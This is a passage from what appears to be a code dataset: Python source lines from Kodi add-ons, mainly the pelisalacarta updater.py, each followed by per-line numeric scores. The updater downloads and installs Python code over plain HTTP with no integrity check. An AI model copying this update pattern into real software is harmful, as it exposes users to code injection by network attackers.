\n", " \n", " '''\n", " #get rid of sources with no resolver plugin\n", " sources = filter_source_list(sources)\n", " \n", " #show dialog to choose source\n", " if len(sources) > 1:\n", " dialog = xbmcgui.Dialog()\n", " titles = []\n", " for source in sources:\n", " titles.append(source.title)\n", " index = dialog.select('Choose your stream', titles)\n", " if index > -1:\n", " return sources[index]\n", " else:\n", " return False\n", " \n", " #only one playable source so just play it\n", " elif len(sources) == 1:\n", " return sources[0] \n", " \n", " #no playable sources available\n", " else:\n", " common.addon.log_error('no playable streams found')\n", " return False\n", "\n", "def get_res_setting():\n", " value = common.addon.get_setting('%s_%s' % \n", " (\"ResolutionSetting\", \"quality\"))\n", " \n", " if value == \"0\":\n", " dialog = xbmcgui.Dialog()\n", " titles = [u'每次询问',\n", " u'320P(流畅):适合非常非常慢的网速',\n", " u'480P(高清):适合一般宽带上网的网速4M左右',\n", " u'720P(超清):适合比较快的光纤或者小区宽带10M左右',\n", " u'1080P(蓝光):需要极高的网速即使40M以上也不保证能正常播放']\n", " index = dialog.select('选择适合你网络环境的清晰度', titles)\n", " if index != -1:\n", " xbmcaddon.Addon(id='script.module.urlresolvercn').setSetting('%s_%s' % \n", " (\"ResolutionSetting\", \"quality\"),str(index))\n", " return index\n", " else:\n", " return False\n", " else:\n", " return int(value)\n", "\n", "def display_settings():\n", " '''\n", " Opens the settings dialog for :mod:`urlresolver` and its plugins.\n", " \n", " This can be called from your addon to provide access to global \n", " :mod:`urlresolver` settings. Each resolver plugin is also capable of \n", " exposing settings.\n", " \n", " .. 
note::\n", " \n", " All changes made to these setting by the user are global and will \n", " affect any addon that uses :mod:`urlresolver` and its plugins.\n", " '''\n", " _update_settings_xml()\n", " common.addon.show_settings()\n", " \n", " \n", "def _update_settings_xml():\n", " '''\n", " This function writes a new ``resources/settings.xml`` file which contains\n", " all settings for this addon and its plugins.\n", " '''\n", " try:\n", " try:\n", " os.makedirs(os.path.dirname(common.settings_file))\n", " except OSError:\n", " pass\n", "\n", " f = open(common.settings_file, 'w')\n", " try:\n", " f.write('<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?>\\n')\n", " f.write('<settings>\\n') \n", " for imp in PluginSettings.implementors():\n", " f.write('<category label=\"%s\">\\n' % imp.name)\n", " f.write(imp.get_settings_xml())\n", " f.write('</category>\\n')\n", " f.write('</settings>')\n", " finally:\n", " f.close\n", " except IOError:\n", " common.addon.log_error('error writing ' + common.settings_file)\n", "\n", "\n", "#make sure settings.xml is up to date\n", "_update_settings_xml()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.013888888888888888, 0, 0, 0, 1, 0.038461538461538464, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0, 0.045454545454545456, 0.125, 0, 0.2, 0, 0.1111111111111111, 0, 0.02, 0.1111111111111111, 0.012658227848101266, 0.015151515151515152, 0, 0.013157894736842105, 0.01282051282051282, 0.012658227848101266, 0.012345679012345678, 0, 0.2, 0.14285714285714285, 0.6666666666666666, 0.037037037037037035, 0, 0.1, 0, 0, 0.1111111111111111, 0, 0.01282051282051282, 0.016129032258064516, 0, 0, 0, 0, 0.25, 0.2, 0.02702702702702703, 0, 0.012658227848101266, 0.012658227848101266, 0.013333333333333334, 0, 0.2, 0, 0.016666666666666666, 0.012345679012345678, 0, 0.1111111111111111, 0, 0.01282051282051282, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.01282051282051282, 0.0125, 0.0125, 0, 0.2, 0, 0.2, 0.009433962264150943, 0.009433962264150943, 0.043478260869565216, 0.07692307692307693, 0.030303030303030304, 0.030303030303030304, 0.125, 0.03571428571428571, 0, 0.1, 0.012987012987012988, 0, 0.1111111111111111, 0, 0.013333333333333334, 0.01282051282051282, 0.1111111111111111, 0, 0.020833333333333332, 0, 0.2, 0.029411764705882353, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.021739130434782608, 0, 0.03333333333333333, 0.2, 0.02857142857142857, 0, 0, 0, 0, 0.043478260869565216, 0.020833333333333332, 0.01282051282051282, 0.022222222222222223, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.023809523809523808, 0.033707865168539325, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0.2, 0.014705882352941176, 0.013513513513513514, 0, 0.2, 0, 0.2, 0.013333333333333334, 0, 0, 0, 0, 0.1111111111111111, 0.1111111111111111, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.025, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02631578947368421, 0 ]
217
0.03297
false
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta # XBMC Plugin #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os import sys import scrapertools import time import config import logger PLUGIN_NAME = "pelisalacarta" # FIXME: Esto está repetido en el channelselector, debería ir a config thumbnail_type = config.get_setting("thumbnail_type") if thumbnail_type=="": thumbnail_type="2" logger.info("thumbnail_type="+thumbnail_type) if thumbnail_type=="0": IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/posters/' elif thumbnail_type=="1": IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/banners/' elif thumbnail_type=="2": IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/squares/' ROOT_DIR = config.get_runtime_path() REMOTE_VERSION_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-version.xml" LOCAL_VERSION_FILE = os.path.join( ROOT_DIR , "version.xml" ) LOCAL_FILE = os.path.join( ROOT_DIR , PLUGIN_NAME+"-" ) try: # Añadida a la opcion : si plataforma xbmcdharma es "True", no debe ser con la plataforma de la xbox # porque seria un falso "True", ya que el xbmc en las xbox no son dharma por lo tanto no existen los addons logger.info("[updater.py] get_platform="+config.get_platform()) logger.info("[updater.py] get_system_platform="+config.get_system_platform()) if config.get_platform()=="xbmcdharma" and not config.get_system_platform() == "xbox": import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-addon-dharma-" DESTINATION_FOLDER = xbmc.translatePath( "special://home/addons") elif config.get_platform()=="xbmceden": import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-addon-eden-" DESTINATION_FOLDER = xbmc.translatePath( "special://home/addons") elif config.get_platform()=="xbmc": import xbmc REMOTE_FILE = 
"http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-plugin-" DESTINATION_FOLDER = xbmc.translatePath( "special://home/plugins/video") elif config.get_platform()=="wiimc": REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-wiimc-" DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),"..") elif config.get_platform()=="rss": REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-rss-" DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),"..") except: import xbmc REMOTE_FILE = "http://blog.tvalacarta.info/descargas/"+PLUGIN_NAME+"-xbmc-plugin-" DESTINATION_FOLDER = xbmc.translatePath( os.path.join( ROOT_DIR , ".." ) ) def checkforupdates(): logger.info("[updater.py] checkforupdates") # Descarga el fichero con la versión en la web logger.info("[updater.py] Verificando actualizaciones...") logger.info("[updater.py] Version remota: "+REMOTE_VERSION_FILE) data = scrapertools.cachePage( REMOTE_VERSION_FILE ) #logger.info("xml descargado="+data) patronvideos = '<tag>([^<]+)</tag>' matches = re.compile(patronvideos,re.DOTALL).findall(data) #scrapertools.printMatches(matches) versiondescargada = matches[0] logger.info("[updater.py] version descargada="+versiondescargada) # Lee el fichero con la versión instalada localFileName = LOCAL_VERSION_FILE logger.info("[updater.py] Version local: "+localFileName) infile = open( localFileName ) data = infile.read() infile.close(); #logger.info("xml local="+data) matches = re.compile(patronvideos,re.DOTALL).findall(data) #scrapertools.printMatches(matches) versionlocal = matches[0] logger.info("[updater.py] version local="+versionlocal) arraydescargada = versiondescargada.split(".") arraylocal = versionlocal.split(".") # local 2.8.0 - descargada 2.8.0 -> no descargar # local 2.9.0 - descargada 2.8.0 -> no descargar # local 2.8.0 - descargada 2.9.0 -> descargar if len(arraylocal) == len(arraydescargada): #logger.info("caso 1") hayqueactualizar = False for i in range(0, len(arraylocal)): 
#print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i]) if int(arraydescargada[i]) > int(arraylocal[i]): hayqueactualizar = True # local 2.8.0 - descargada 2.8 -> no descargar # local 2.9.0 - descargada 2.8 -> no descargar # local 2.8.0 - descargada 2.9 -> descargar if len(arraylocal) > len(arraydescargada): #logger.info("caso 2") hayqueactualizar = False for i in range(0, len(arraydescargada)): #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i]) if int(arraydescargada[i]) > int(arraylocal[i]): hayqueactualizar = True # local 2.8 - descargada 2.8.8 -> descargar # local 2.9 - descargada 2.8.8 -> no descargar # local 2.10 - descargada 2.9.9 -> no descargar # local 2.5 - descargada 3.0.0 if len(arraylocal) < len(arraydescargada): #logger.info("caso 3") hayqueactualizar = True for i in range(0, len(arraylocal)): #print arraylocal[i], arraydescargada[i], int(arraylocal[i])>int(arraydescargada[i]) if int(arraylocal[i]) > int(arraydescargada[i]): hayqueactualizar = False elif int(arraylocal[i]) < int(arraydescargada[i]): hayqueactualizar = True break if (hayqueactualizar): logger.info("[updater.py] actualizacion disponible") # Añade al listado de XBMC import xbmcgui thumbnail = IMAGES_PATH+"Crystal_Clear_action_info.png" logger.info("thumbnail="+thumbnail) listitem = xbmcgui.ListItem( "Descargar version "+versiondescargada, thumbnailImage=thumbnail ) itemurl = '%s?action=update&version=%s' % ( sys.argv[ 0 ] , versiondescargada ) import xbmcplugin xbmcplugin.addDirectoryItem( handle = int(sys.argv[ 1 ]), url = itemurl , listitem=listitem, isFolder=True) # Avisa con un popup dialog = xbmcgui.Dialog() dialog.ok("Versión "+versiondescargada+" disponible","Ya puedes descargar la nueva versión del plugin\ndesde el listado principal") ''' except: logger.info("No se han podido verificar actualizaciones...") import sys for line in sys.exc_info(): logger.error( "%s" % line ) ''' def update(params): # Descarga el ZIP 
logger.info("[updater.py] update") remotefilename = REMOTE_FILE+params.get("version")+".zip" localfilename = LOCAL_FILE+params.get("version")+".zip" logger.info("[updater.py] remotefilename=%s" % remotefilename) logger.info("[updater.py] localfilename=%s" % localfilename) logger.info("[updater.py] descarga fichero...") inicio = time.clock() #urllib.urlretrieve(remotefilename,localfilename) from core import downloadtools downloadtools.downloadfile(remotefilename, localfilename) fin = time.clock() logger.info("[updater.py] Descargado en %d segundos " % (fin-inicio+1)) # Lo descomprime logger.info("[updater.py] descomprime fichero...") import ziptools unzipper = ziptools.ziptools() destpathname = DESTINATION_FOLDER logger.info("[updater.py] destpathname=%s" % destpathname) unzipper.extract(localfilename,destpathname) # Borra el zip descargado logger.info("[updater.py] borra fichero...") os.remove(localfilename) logger.info("[updater.py] ...fichero borrado") def get_channel_remote_url(channel_name): if channel_name<>"channelselector": remote_channel_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+PLUGIN_NAME+"/channels/"+channel_name+".py" remote_version_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+PLUGIN_NAME+"/channels/"+channel_name+".xml" else: remote_channel_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+channel_name+".py" remote_version_url = "http://xbmc-tvalacarta.googlecode.com/svn/trunk/"+PLUGIN_NAME+"/"+channel_name+".xml" logger.info("[updater.py] remote_channel_url="+remote_channel_url) logger.info("[updater.py] remote_version_url="+remote_version_url) return remote_channel_url , remote_version_url def get_channel_local_path(channel_name): # TODO: (3.2) El XML debería escribirse en el userdata, de forma que se leerán dos ficheros locales: el del userdata y el que está junto al py (vendrá con el plugin). 
El mayor de los 2 es la versión actual, y si no existe fichero se asume versión 0 if channel_name<>"channelselector": local_channel_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+".py" ) local_version_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+".xml" ) local_compiled_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+".pyo" ) else: local_channel_path = os.path.join( config.get_runtime_path() , channel_name+".py" ) local_version_path = os.path.join( config.get_runtime_path() , channel_name+".xml" ) local_compiled_path = os.path.join( config.get_runtime_path() , channel_name+".pyo" ) logger.info("[updater.py] local_channel_path="+local_channel_path) logger.info("[updater.py] local_version_path="+local_version_path) logger.info("[updater.py] local_compiled_path="+local_compiled_path) return local_channel_path , local_version_path , local_compiled_path def updatechannel(channel_name): logger.info("[updater.py] updatechannel('"+channel_name+"')") # Canal remoto remote_channel_url , remote_version_url = get_channel_remote_url(channel_name) # Canal local local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name) #if not os.path.exists(local_channel_path): # return False; # Version remota try: data = scrapertools.cachePage( remote_version_url ) logger.info("[updater.py] remote_data="+data) patronvideos = '<tag>([^<]+)</tag>' matches = re.compile(patronvideos,re.DOTALL).findall(data) remote_version = int(matches[0]) except: remote_version = 0 logger.info("[updater.py] remote_version=%d" % remote_version) # Version local if os.path.exists( local_version_path ): infile = open( local_version_path ) data = infile.read() infile.close(); logger.info("[updater.py] local_data="+data) patronvideos = '<tag>([^<]+)</tag>' matches = re.compile(patronvideos,re.DOTALL).findall(data) local_version = int(matches[0]) else: 
local_version = 0 logger.info("[updater.py] local_version=%d" % local_version) # Comprueba si ha cambiado updated = remote_version > local_version if updated: logger.info("[updater.py] updated") download_channel(channel_name) return updated def download_channel(channel_name): logger.info("[updater.py] download_channel('"+channel_name+"')") # Canal remoto remote_channel_url , remote_version_url = get_channel_remote_url(channel_name) # Canal local local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name) # Descarga el canal updated_channel_data = scrapertools.cachePage( remote_channel_url ) try: outfile = open(local_channel_path,"w") outfile.write(updated_channel_data) outfile.flush() outfile.close() logger.info("[updater.py] Grabado a " + local_channel_path) except: logger.info("[updater.py] Error al grabar " + local_channel_path) import sys for line in sys.exc_info(): logger.error( "%s" % line ) # Descarga la version (puede no estar) try: updated_version_data = scrapertools.cachePage( remote_version_url ) outfile = open(local_version_path,"w") outfile.write(updated_version_data) outfile.flush() outfile.close() logger.info("[updater.py] Grabado a " + local_version_path) except: import sys for line in sys.exc_info(): logger.error( "%s" % line ) if os.path.exists(local_compiled_path): os.remove(local_compiled_path)
[ "# -*- coding: utf-8 -*-\n", "#------------------------------------------------------------\n", "# pelisalacarta\n", "# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta\n", "# XBMC Plugin\n", "#------------------------------------------------------------\n", "\n", "import urlparse,urllib2,urllib,re\n", "import os\n", "import sys\n", "import scrapertools\n", "import time\n", "import config\n", "import logger\n", "\n", "PLUGIN_NAME = \"pelisalacarta\"\n", "\n", "# FIXME: Esto está repetido en el channelselector, debería ir a config\n", "thumbnail_type = config.get_setting(\"thumbnail_type\")\n", "if thumbnail_type==\"\":\n", " thumbnail_type=\"2\"\n", "logger.info(\"thumbnail_type=\"+thumbnail_type)\n", "if thumbnail_type==\"0\":\n", " IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/posters/'\n", "elif thumbnail_type==\"1\":\n", " IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/banners/'\n", "elif thumbnail_type==\"2\":\n", " IMAGES_PATH = 'http://pelisalacarta.mimediacenter.info/squares/'\n", "\n", "ROOT_DIR = config.get_runtime_path()\n", "\n", "REMOTE_VERSION_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-version.xml\"\n", "LOCAL_VERSION_FILE = os.path.join( ROOT_DIR , \"version.xml\" )\n", "LOCAL_FILE = os.path.join( ROOT_DIR , PLUGIN_NAME+\"-\" )\n", "\n", "try:\n", " # Añadida a la opcion : si plataforma xbmcdharma es \"True\", no debe ser con la plataforma de la xbox\n", " # porque seria un falso \"True\", ya que el xbmc en las xbox no son dharma por lo tanto no existen los addons\n", " logger.info(\"[updater.py] get_platform=\"+config.get_platform())\n", " logger.info(\"[updater.py] get_system_platform=\"+config.get_system_platform())\n", " if config.get_platform()==\"xbmcdharma\" and not config.get_system_platform() == \"xbox\":\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-addon-dharma-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( \"special://home/addons\")\n", 
" elif config.get_platform()==\"xbmceden\":\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-addon-eden-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( \"special://home/addons\")\n", " elif config.get_platform()==\"xbmc\":\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-plugin-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( \"special://home/plugins/video\")\n", " elif config.get_platform()==\"wiimc\":\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-wiimc-\"\n", " DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),\"..\")\n", " elif config.get_platform()==\"rss\":\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-rss-\"\n", " DESTINATION_FOLDER = os.path.join(config.get_runtime_path(),\"..\")\n", "\n", "except:\n", " import xbmc\n", " REMOTE_FILE = \"http://blog.tvalacarta.info/descargas/\"+PLUGIN_NAME+\"-xbmc-plugin-\"\n", " DESTINATION_FOLDER = xbmc.translatePath( os.path.join( ROOT_DIR , \"..\" ) )\n", "\n", "def checkforupdates():\n", " logger.info(\"[updater.py] checkforupdates\")\n", "\n", " # Descarga el fichero con la versión en la web\n", " logger.info(\"[updater.py] Verificando actualizaciones...\")\n", " logger.info(\"[updater.py] Version remota: \"+REMOTE_VERSION_FILE)\n", " data = scrapertools.cachePage( REMOTE_VERSION_FILE )\n", " #logger.info(\"xml descargado=\"+data)\n", " patronvideos = '<tag>([^<]+)</tag>'\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " #scrapertools.printMatches(matches)\n", " versiondescargada = matches[0]\n", " logger.info(\"[updater.py] version descargada=\"+versiondescargada)\n", " \n", " # Lee el fichero con la versión instalada\n", " localFileName = LOCAL_VERSION_FILE\n", " logger.info(\"[updater.py] Version local: \"+localFileName)\n", " infile = open( localFileName )\n", " data = infile.read()\n", " infile.close();\n", " 
#logger.info(\"xml local=\"+data)\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " #scrapertools.printMatches(matches)\n", " versionlocal = matches[0]\n", " logger.info(\"[updater.py] version local=\"+versionlocal)\n", "\n", " arraydescargada = versiondescargada.split(\".\")\n", " arraylocal = versionlocal.split(\".\")\n", " \n", " # local 2.8.0 - descargada 2.8.0 -> no descargar\n", " # local 2.9.0 - descargada 2.8.0 -> no descargar\n", " # local 2.8.0 - descargada 2.9.0 -> descargar\n", " if len(arraylocal) == len(arraydescargada):\n", " #logger.info(\"caso 1\")\n", " hayqueactualizar = False\n", " for i in range(0, len(arraylocal)):\n", " #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i])\n", " if int(arraydescargada[i]) > int(arraylocal[i]):\n", " hayqueactualizar = True\n", " # local 2.8.0 - descargada 2.8 -> no descargar\n", " # local 2.9.0 - descargada 2.8 -> no descargar\n", " # local 2.8.0 - descargada 2.9 -> descargar\n", " if len(arraylocal) > len(arraydescargada):\n", " #logger.info(\"caso 2\")\n", " hayqueactualizar = False\n", " for i in range(0, len(arraydescargada)):\n", " #print arraylocal[i], arraydescargada[i], int(arraydescargada[i]) > int(arraylocal[i])\n", " if int(arraydescargada[i]) > int(arraylocal[i]):\n", " hayqueactualizar = True\n", " # local 2.8 - descargada 2.8.8 -> descargar\n", " # local 2.9 - descargada 2.8.8 -> no descargar\n", " # local 2.10 - descargada 2.9.9 -> no descargar\n", " # local 2.5 - descargada 3.0.0\n", " if len(arraylocal) < len(arraydescargada):\n", " #logger.info(\"caso 3\")\n", " hayqueactualizar = True\n", " for i in range(0, len(arraylocal)):\n", " #print arraylocal[i], arraydescargada[i], int(arraylocal[i])>int(arraydescargada[i])\n", " if int(arraylocal[i]) > int(arraydescargada[i]):\n", " hayqueactualizar = False\n", " elif int(arraylocal[i]) < int(arraydescargada[i]):\n", " hayqueactualizar = True\n", " break\n", "\n", " if (hayqueactualizar):\n", " 
logger.info(\"[updater.py] actualizacion disponible\")\n", " \n", " # Añade al listado de XBMC\n", " import xbmcgui\n", " thumbnail = IMAGES_PATH+\"Crystal_Clear_action_info.png\"\n", " logger.info(\"thumbnail=\"+thumbnail)\n", " listitem = xbmcgui.ListItem( \"Descargar version \"+versiondescargada, thumbnailImage=thumbnail )\n", " itemurl = '%s?action=update&version=%s' % ( sys.argv[ 0 ] , versiondescargada )\n", " import xbmcplugin\n", " xbmcplugin.addDirectoryItem( handle = int(sys.argv[ 1 ]), url = itemurl , listitem=listitem, isFolder=True)\n", " \n", " # Avisa con un popup\n", " dialog = xbmcgui.Dialog()\n", " dialog.ok(\"Versión \"+versiondescargada+\" disponible\",\"Ya puedes descargar la nueva versión del plugin\\ndesde el listado principal\")\n", "\n", " '''\n", " except:\n", " logger.info(\"No se han podido verificar actualizaciones...\")\n", " import sys\n", " for line in sys.exc_info():\n", " logger.error( \"%s\" % line )\n", " '''\n", "def update(params):\n", " # Descarga el ZIP\n", " logger.info(\"[updater.py] update\")\n", " remotefilename = REMOTE_FILE+params.get(\"version\")+\".zip\"\n", " localfilename = LOCAL_FILE+params.get(\"version\")+\".zip\"\n", " logger.info(\"[updater.py] remotefilename=%s\" % remotefilename)\n", " logger.info(\"[updater.py] localfilename=%s\" % localfilename)\n", " logger.info(\"[updater.py] descarga fichero...\")\n", " inicio = time.clock()\n", " \n", " #urllib.urlretrieve(remotefilename,localfilename)\n", " from core import downloadtools\n", " downloadtools.downloadfile(remotefilename, localfilename)\n", " \n", " fin = time.clock()\n", " logger.info(\"[updater.py] Descargado en %d segundos \" % (fin-inicio+1))\n", " \n", " # Lo descomprime\n", " logger.info(\"[updater.py] descomprime fichero...\")\n", " import ziptools\n", " unzipper = ziptools.ziptools()\n", " destpathname = DESTINATION_FOLDER\n", " logger.info(\"[updater.py] destpathname=%s\" % destpathname)\n", " unzipper.extract(localfilename,destpathname)\n", " 
\n", " # Borra el zip descargado\n", " logger.info(\"[updater.py] borra fichero...\")\n", " os.remove(localfilename)\n", " logger.info(\"[updater.py] ...fichero borrado\")\n", "\n", "def get_channel_remote_url(channel_name):\n", " if channel_name<>\"channelselector\":\n", " remote_channel_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+PLUGIN_NAME+\"/channels/\"+channel_name+\".py\"\n", " remote_version_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+PLUGIN_NAME+\"/channels/\"+channel_name+\".xml\"\n", " else:\n", " remote_channel_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+channel_name+\".py\"\n", " remote_version_url = \"http://xbmc-tvalacarta.googlecode.com/svn/trunk/\"+PLUGIN_NAME+\"/\"+channel_name+\".xml\"\n", "\n", " logger.info(\"[updater.py] remote_channel_url=\"+remote_channel_url)\n", " logger.info(\"[updater.py] remote_version_url=\"+remote_version_url)\n", " \n", " return remote_channel_url , remote_version_url\n", "\n", "def get_channel_local_path(channel_name):\n", " # TODO: (3.2) El XML debería escribirse en el userdata, de forma que se leerán dos ficheros locales: el del userdata y el que está junto al py (vendrá con el plugin). 
El mayor de los 2 es la versión actual, y si no existe fichero se asume versión 0\n", " if channel_name<>\"channelselector\":\n", " local_channel_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+\".py\" )\n", " local_version_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+\".xml\" )\n", " local_compiled_path = os.path.join( config.get_runtime_path(), PLUGIN_NAME , 'channels' , channel_name+\".pyo\" )\n", " else:\n", " local_channel_path = os.path.join( config.get_runtime_path() , channel_name+\".py\" )\n", " local_version_path = os.path.join( config.get_runtime_path() , channel_name+\".xml\" )\n", " local_compiled_path = os.path.join( config.get_runtime_path() , channel_name+\".pyo\" )\n", "\n", " logger.info(\"[updater.py] local_channel_path=\"+local_channel_path)\n", " logger.info(\"[updater.py] local_version_path=\"+local_version_path)\n", " logger.info(\"[updater.py] local_compiled_path=\"+local_compiled_path)\n", " \n", " return local_channel_path , local_version_path , local_compiled_path\n", "\n", "def updatechannel(channel_name):\n", " logger.info(\"[updater.py] updatechannel('\"+channel_name+\"')\")\n", " \n", " # Canal remoto\n", " remote_channel_url , remote_version_url = get_channel_remote_url(channel_name)\n", " \n", " # Canal local\n", " local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name)\n", " \n", " #if not os.path.exists(local_channel_path):\n", " # return False;\n", "\n", " # Version remota\n", " try:\n", " data = scrapertools.cachePage( remote_version_url )\n", " logger.info(\"[updater.py] remote_data=\"+data)\n", " patronvideos = '<tag>([^<]+)</tag>'\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " remote_version = int(matches[0])\n", " except:\n", " remote_version = 0\n", "\n", " logger.info(\"[updater.py] remote_version=%d\" % remote_version)\n", "\n", " # Version local\n", " if os.path.exists( 
local_version_path ):\n", " infile = open( local_version_path )\n", " data = infile.read()\n", " infile.close();\n", " logger.info(\"[updater.py] local_data=\"+data)\n", " patronvideos = '<tag>([^<]+)</tag>'\n", " matches = re.compile(patronvideos,re.DOTALL).findall(data)\n", " local_version = int(matches[0])\n", " else:\n", " local_version = 0\n", " \n", " logger.info(\"[updater.py] local_version=%d\" % local_version)\n", " \n", " # Comprueba si ha cambiado\n", " updated = remote_version > local_version\n", "\n", " if updated:\n", " logger.info(\"[updater.py] updated\")\n", " download_channel(channel_name)\n", "\n", " return updated\n", "\n", "def download_channel(channel_name):\n", " logger.info(\"[updater.py] download_channel('\"+channel_name+\"')\")\n", " # Canal remoto\n", " remote_channel_url , remote_version_url = get_channel_remote_url(channel_name)\n", " \n", " # Canal local\n", " local_channel_path , local_version_path , local_compiled_path = get_channel_local_path(channel_name)\n", "\n", " # Descarga el canal\n", " updated_channel_data = scrapertools.cachePage( remote_channel_url )\n", " try:\n", " outfile = open(local_channel_path,\"w\")\n", " outfile.write(updated_channel_data)\n", " outfile.flush()\n", " outfile.close()\n", " logger.info(\"[updater.py] Grabado a \" + local_channel_path)\n", " except:\n", " logger.info(\"[updater.py] Error al grabar \" + local_channel_path)\n", " import sys\n", " for line in sys.exc_info():\n", " logger.error( \"%s\" % line )\n", "\n", " # Descarga la version (puede no estar)\n", " try:\n", " updated_version_data = scrapertools.cachePage( remote_version_url )\n", " outfile = open(local_version_path,\"w\")\n", " outfile.write(updated_version_data)\n", " outfile.flush()\n", " outfile.close()\n", " logger.info(\"[updater.py] Grabado a \" + local_version_path)\n", " except:\n", " import sys\n", " for line in sys.exc_info():\n", " logger.error( \"%s\" % line )\n", "\n", " if os.path.exists(local_compiled_path):\n", " 
os.remove(local_compiled_path)\n" ]
[ 0, 0.016129032258064516, 0, 0, 0, 0.016129032258064516, 0, 0.11764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.043478260869565216, 0.043478260869565216, 0, 0.041666666666666664, 0, 0.038461538461538464, 0, 0.038461538461538464, 0, 0, 0, 0, 0.011111111111111112, 0.04838709677419355, 0.05357142857142857, 0, 0, 0.009523809523809525, 0.008928571428571428, 0, 0.012195121951219513, 0.02197802197802198, 0, 0.010309278350515464, 0.013513513513513514, 0.022727272727272728, 0, 0.010526315789473684, 0.013513513513513514, 0.025, 0, 0.01098901098901099, 0.024691358024691357, 0.024390243902439025, 0.011764705882352941, 0.013513513513513514, 0.02564102564102564, 0.012048192771084338, 0.013513513513513514, 0, 0.125, 0, 0.011494252873563218, 0.06329113924050633, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0.03508771929824561, 0.024390243902439025, 0.024390243902439025, 0.015873015873015872, 0.025, 0, 0, 0.2, 0, 0, 0, 0.05714285714285714, 0, 0.05, 0.027777777777777776, 0.015873015873015872, 0.025, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.020202020202020204, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.020202020202020204, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0.020618556701030927, 0, 0.023809523809523808, 0, 0.024390243902439025, 0, 0, 0, 0, 0.1111111111111111, 0, 0, 0, 0, 0.028846153846153848, 0.06818181818181818, 0, 0.07758620689655173, 0.1111111111111111, 0, 0, 0.014285714285714285, 0, 0, 0, 0, 0, 0, 0, 0, 0.05, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0.018518518518518517, 0, 0, 0.2, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.02040816326530612, 0.2, 0, 0, 0, 0, 0, 0.023809523809523808, 0.075, 0.007142857142857143, 0.0070921985815602835, 0, 0.008695652173913044, 0.008620689655172414, 0, 0, 0, 0.2, 0.0196078431372549, 0, 